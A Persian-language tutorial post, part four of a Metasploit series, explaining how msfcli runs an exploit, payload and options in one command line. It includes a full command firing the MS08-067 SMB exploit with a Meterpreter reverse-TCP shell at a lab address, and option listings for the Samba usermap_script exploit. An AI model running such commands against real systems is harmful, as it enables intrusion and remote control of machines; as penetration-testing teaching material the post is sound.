سلام دوستان . قسمت چهارم از آموزش های متااسپلویت را در پیش رو داریم . قبلا با کنسول متااسپلویت آشنا شده ایم اما می توان به جای وارد کردن تک تک دستورات , همه را در یک خط نوشت و آن را اجرا کرد . مثلا زمانی رو فرض کنید که می دانیم دقیقا چه exploit و چه payload و … را لازم داریم . پس به جای کار با کنسول که شاید زمان بر هم باشد , همه را در یک خط می نویسیم و سپس آن را اجرا می کنیم .
برای این منظور از msfcli استفاده می کنیم . برای مشاهده قابلیت های این برنامه به صورت زیر عمل می کنیم :
root@kali:~# msfcli -h
به عنوان مثال :
msfcli exploit/windows/smb/ms08_067_netapi RHOST=172.16.40.20 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.40.10 E
همان طور که مشاهده می کنید ابتدا exploit و سپس payload مورد نظر را همراه با option هایش مشخص کردیم .
حرف بزرگ E در آخر دستور بالا به منظور اجرای این فرایند می باشد .
(E)xecute Execute the selected module
نکته : همان طور که از خروجی help برنامه مشخص است , حرف بزرگ O به منظور نمایش دادن option های یک module است . به عنوان مثال برای مشاهده ی option های یک exploit به صورت زیر عمل می کنیم :
root@kali:~# msfcli exploit/multi/samba/usermap_script O
نکته : برای مشاهده ی payload های فعال یک exploit از حرف بزرگ P استفاده می کنیم . به عنوان مثال :
root@kali:~# msfcli exploit/multi/samba/usermap_script P
لازم به ذکر است که می توان msfcli در اسکریپت نویسی نیز استفاده کرد چرا که تمامی کار های مربوط به metasploit را می تواند در یک خط انجام دهد و دیگر نیازی به رابط کنسول نباشد .
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N